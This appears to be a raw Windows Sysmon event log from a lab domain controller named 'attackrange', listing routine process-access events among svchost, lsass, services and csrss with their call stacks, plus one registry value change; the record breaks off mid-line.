12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:46.127{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.096{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:46.096{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.096{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:46.096{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.096{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:46.096{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.081{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 
10341000x80000000000000001316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.081{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.081{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.081{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.081{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:45.752{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646D-6064-1800-00000000AE01}2092C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.752{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646D-6064-1800-00000000AE01}2092C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:45.565{266CAFBE-646A-6064-0A00-00000000AE01}840936C:\Windows\system32\services.exe{266CAFBE-646D-6064-1800-00000000AE01}2092C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:45.518{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000615) 10341000x80000000000000001308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.502{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:45.502{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.487{266CAFBE-646C-6064-1000-00000000AE01}11241736C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.487{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-646D-6064-1800-00000000AE01}2092C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:45.487{266CAFBE-646A-6064-0A00-00000000AE01}8401136C:\Windows\system32\services.exe{266CAFBE-646D-6064-1800-00000000AE01}2092C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\S